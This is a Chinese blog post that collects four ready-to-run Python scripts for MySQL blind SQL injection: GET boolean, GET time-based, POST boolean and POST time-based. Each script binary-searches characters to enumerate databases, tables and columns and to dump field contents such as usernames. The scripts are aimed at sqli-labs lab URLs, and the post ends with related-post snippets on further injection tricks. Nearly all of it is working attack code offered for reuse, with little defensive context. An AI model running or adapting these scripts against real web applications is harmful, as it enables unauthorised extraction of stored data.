mysql 盲注脚本大全

原创 已于 2024-10-24 17:30:35 修改 · 123 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #python #数据库

于 2022-08-02 12:32:45 首次发布

目录

1、get bool 盲注

2、get time 盲注

3、post bool 盲注

4、post time 盲注

 

 

 

MySQL中查询所有数据库名和表名

1.查询所有数据库

show databases;
(select group_concat(schema_name ) from information_schema.schemata)

2.查询指定数据库中所有表名

(select group_concat(table_name) from information_schema.tables where table_schema=database())

3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')

4.查询指定字段中的内容

(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)

group_concat(字段) from (表名)
 

1、get bool 盲注

import requests
from urllib.parse import quote

session = requests.session()

# url = "http://61.147.171.105:62055/view.php?no=1"
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" #闭合方式在这里体现
# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
        'Referer': "http://www.baidu.com/"
}

# 用户请求头
# headers = {
#     'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
#     'Referer': "https://creator.douyin.com/"
# }

#设置访问正确时的判断数据
success_text="Your Login name"


#爆当前数据库名长度
def Database_length():
    database_length=0
    for i in range(1,10):
        payload = quote(" and length(database())="+str(i)+"#")#对特殊符号进行url编码
        text=session.get(url+payload,headers=headers).text
        if success_text in text:
            database_length=i
            break
    print("database_length:",database_length)



# 爆当前数据库名字
def Database_name():
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
            text2 = requests.get(url+payload2 , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("database_name:", database_name)

# 爆数据库名
def Databases_names():
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name):
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name):
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("dump:",dump)

# 爆当前数据库长度
# Database_length()

#爆当前数据库名
# Database_name()

# 爆所有数据库名
Databases_names()

# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")

# 爆指定表名的列名
# 参数为表名
# Columns_name("emails")

# 爆指定数据库、表、列名的内容
# Dump("security","users","username")

2、get time 盲注

import requests
from urllib.parse import quote
import time
url = '''http://192.168.215.134:86/Less-16/?uname=admin") '''  #闭合方式在这里体现

# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/"
         }

# 爆当前数据库名字
def Database_name():
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 =" and if(ascii(substr(database(),%d,1))=%d,sleep(1),1)#"%(i,mid)
            start_time=time.time()
            # print(start_time)
            requests.get(url+quote(payload1) , headers=headers)
            # print(time.time())
            if (time.time()-start_time>0.5):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2 =" and if(ascii(substr(database(),%d,1))>%d,sleep(1),1)#"%(i,mid)
            start_time=time.time()
            requests.get(url+quote(payload2) , headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("database_name:", database_name)

# 爆数据库名
def Databases_names():
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d,sleep(1),1) # "%(i,mid)
            start_time=time.time()
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (time.time()-start_time>0.5):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2 = " and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d,sleep(1),1) # "%(i,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name):
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d,sleep(1),1) # "%(i,database_name,mid)
            start_time=time.time()
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (time.time()-start_time>0.5):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2 = " and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d,sleep(1),1) # "%(i,database_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name):
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d,sleep(1),1) # "%(i,table_name,mid)
            start_time=time.time()
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (time.time()-start_time>0.5):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2 = " and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d,sleep(1),1) # "%(i,table_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d,sleep(1),1) # "%(columns_name,i,database_name,table_name,mid)
            start_time=time.time()
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (time.time()-start_time>0.5):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = " and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d,sleep(1),1) # "%(columns_name,i,database_name,table_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
    print("dump:",dump)

# 爆当前数据库长度
# Database_length()

#爆当前数据库名
Database_name()

# 爆所有数据库名
# Databases_names()

# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")

# 爆指定表名的列名
# 参数为表名
# Columns_name("users")

# 爆指定数据库、表、列名的内容
# Dump("security","users","username")

3、post bool 盲注

 

import requests
from urllib.parse import quote
import time
import  json

url = '''http://192.168.215.134:86/Less-16/'''

success_text="../images/flag.jpg"

#payload在data里面设置

# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/",
         'Content-Type': 'application/x-www-form-urlencoded',#设置以form表单形式发送post请求

         }
# 爆当前数据库名字
def Database_name():
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and ascii(substring(database(),%d,1))=%d #'''%(i,mid)
            data1 = {
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            text1=requests.post(url ,data=data1, headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2='''admin") and ascii(substring(database(),%d,1))>%d #'''%(i,mid)
            data2 = {'uname':payload2,
                     'passwd':'',
                     'submit':'Submit',
                     }
            text2=requests.post(url ,data=data2 ,headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("database_name:", database_name)

# 爆数据库名
def Databases_names():
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # '''%(i,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url,data=data1, headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # '''%(i,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2=requests.post(url,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name):
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d #'''%(i,database_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url ,data=data1 ,headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d #'''%(i,database_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2 = requests.post(url,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name):
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # '''%(i,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            text1=requests.post(url ,data=data1 ,headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # '''%(i,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2=requests.post(url ,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = '''admin") and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # '''%(columns_name,i,database_name,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url , data=data1,headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = '''admin") and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # '''%(columns_name,i,database_name,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            text2 = requests.post(url ,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
    print("dump:",dump)

#爆当前数据库名
# Database_name()

# 爆所有数据库名
# Databases_names()

# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")

# 爆指定表名的列名
# 参数为表名
# Columns_name("users")

# 爆指定数据库、表、列名的内容
Dump("security","users","username")

4、post time 盲注

import requests
from urllib.parse import quote
import time
import  json

url = '''http://192.168.215.134:86/Less-16/'''

#payload在data里面设置

# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/",
         'Content-Type': 'application/x-www-form-urlencoded',#设置以form表单形式发送post请求

         }
# 爆当前数据库名字
def Database_name():
    database_name=""
    for i in range(1,100):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and if(ascii(substring(database(),%d,1))=%d,sleep(1),1) #'''%(i,mid)
            data1 = {
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data1, headers=headers)
            if (time.time()-start_time>0.5):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2='''admin") and if(ascii(substring(database(),%d,1))>%d,sleep(1),1) #'''%(i,mid)
            data2 = {'uname':payload2,
                     'passwd':'',
                     'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data2 ,headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("database_name:", database_name)

# 爆数据库名
def Databases_names():
    databases_names=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d,sleep(1),1) # '''%(i,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url,data=data1, headers=headers)
            if (time.time()-start_time>0.5):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d,sleep(1),1) # '''%(i,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url,data=data2, headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name):
    tables_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d,sleep(1),1) #'''%(i,database_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data1 ,headers=headers)
            if (time.time()-start_time>0.5):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d,sleep(1),1) #'''%(i,database_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            text2 = requests.post(url,data=data2, headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name):
    columns_name=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d,sleep(1),1) # '''%(i,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data1 ,headers=headers)
            if (time.time()-start_time>0.5):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d,sleep(1),1) # '''%(i,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data2, headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
    dump=""
    for i in range(1,1000):
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = '''admin") and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d,sleep(1),1) # '''%(columns_name,i,database_name,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url , data=data1,headers=headers)
            if (time.time()-start_time>0.5):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = '''admin") and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d,sleep(1),1) # '''%(columns_name,i,database_name,table_name,mid)
            data2={
            'uname':payload2,
            'passwd':'',
            'submit':'Submit',
            }
            start_time=time.time()
            text2 = requests.post(url ,data=data2, headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
    print("dump:",dump)

#爆当前数据库名
# Database_name()

# 爆所有数据库名
# Databases_names()

# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")

# 爆指定表名的列名
# 参数为表名
# Columns_name("users")

# 爆指定数据库、表、列名的内容
Dump("security","users","username")

 

 

 

T1M@
关注
MySQL
聚鼎安全
01-08 801
这里写目录标题布尔时间sleep函数benchmark函数笛卡尔积函数get_lock正则DOS RLIKE入dnslog后续待补充 布尔 一般先看长度 id=4 and length(user())=14 布尔的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
基于DVWA靶场的注脚
altersueyunsheng的博客
05-28 542
基于DVWA的自动注脚本 本文针对的是dvwa部分的low级别的自动入,关于概念等就不做介绍了。相比较有回显的入,这种入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔 dvwa猜解正确会回显"User ID…",以此作为判断是否入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断, str = f'?id={sql}&am
sqli-labs注脚
06-24
sqli-labs注脚本 sqli-labs注脚本 sqli-labs注脚
mysql
m0_65096687的博客
04-09 176
仍然要判断字符类型入,可以根据页面的反应。1 and 1=2 如果页面显示正常,那么就是字符型入,因为如果是数字,不成立,会有异常。所以第一步仍是判断入类型就是存在入但是页面上没有任何回显。分为布尔和时间
MySQL
xu_1234567的博客
09-25 493
1.MySQL入原理 MySQL入是在网址追加MySQL IF查询判断语句,通过网页输出来准确判断出ASCII码的值,拿到ASCII码后得到数据库名 2.MySQL函数 在进行MySQL入,的使用以下MySQL函数 database() 查看数据库名 substr(str,1,4) 字符串截取 mid(str,1,4) 字符串截取 ascii码 if (条件,True,False) database() substr(str,1,4) if(条件,1,0) 3.入测试 ...
MySQL
qq_44656678的博客
09-14 322
关于MySQL大概分为布尔型,时间型 主要会用到一下MySQL函数 在这里插入代码片 ord()转换为整形数值 mid("字符串",1,3)表示提取一个字符串中第一个字符,而且步长为3 limit(0,1)第一个参数指定第一个返回记录行的偏移量,第二个表示返回记录行的最大值 substr()表示把某个字符串提取出来 ascii()将变量变化为ascii转换数值 left() //取...
sqllabs 脚本
02-11
下面是一个简单的Python布尔注脚本框架: ```python import requests target_url = "http://192.168.2.15/sqli-labs/Less-7/" true_string = "You are in" def check_true(payload): params = {'id': payload}...
pikachu sql注脚
最新发布
03-16
### Pikachu 系统 SQL 入漏洞利用脚本 针对 `pikachu` 系统中的 SQL 入漏洞,可以借助自动化工具如 `sqlmap` 或者手动编写脚本来实现漏洞的验证与利用。以下是基于已知信息的相关说明以及可能的脚本示例。 ###...
pikachu sql 注脚本pyhon
01-03
### SQLPython脚本 对于SQL攻击,可以编写一个简单的Python脚本来实现布尔型入或时间延迟入。下面是一个基于布尔型入原理的简单示例: ```python import requests target_url = ...
DVWA-SQL注脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool注脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
Mysql总结
b1ackc4t的博客
01-24 3047
Mysql 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行 手工的基本步骤 判断是否存在入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种 基于报错的 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
mysql总结
z7sz的博客
06-21 1239
本文的内容主要是对mysql的总结
mysql_Mysql 另类中的一些技巧小结
weixin_39765325的博客
01-18 129
一、order by 的参数入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(selec...
mysql入之语句汇总
sirius的博客
08-28 4715
目录 mysql入之 常用语句汇总 基于bool 查询当前数据库 基于时间的 常用函数: regexp正则入 like匹配入 特殊的之报错mysql入之 什么是? 基于布尔型SQL即在SQL入过程中,应用程序仅仅返回True(页面)和False(页面)。 就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
mysql代码
萧刚
10-09 802
代码 ',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
mysql 手动_学习笔记 MYSQL
weixin_36248747的博客
02-02 262
猜解当前数据库名输入 1 ’ and length(database())=1 # ,显示不存在;输入 1 ’ and length(database())=2 # ,显示不存在;输入 1 ’ and length(database())=3 # ,显示不存在;输入 1 ’ and length(database())=4 # ,显示存在:采用二分法猜解数据库名输入 1’ and asci...
mysql_mysql学习-1
weixin_32504329的博客
02-19 158
mysql:1.left() //left()函数left(a,b)从左侧截取a,的b位2.mid() //mid()函数参数描述column_name必需。要提取字符的字段。start必需。规定开始位置(起始值是 1)。length可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值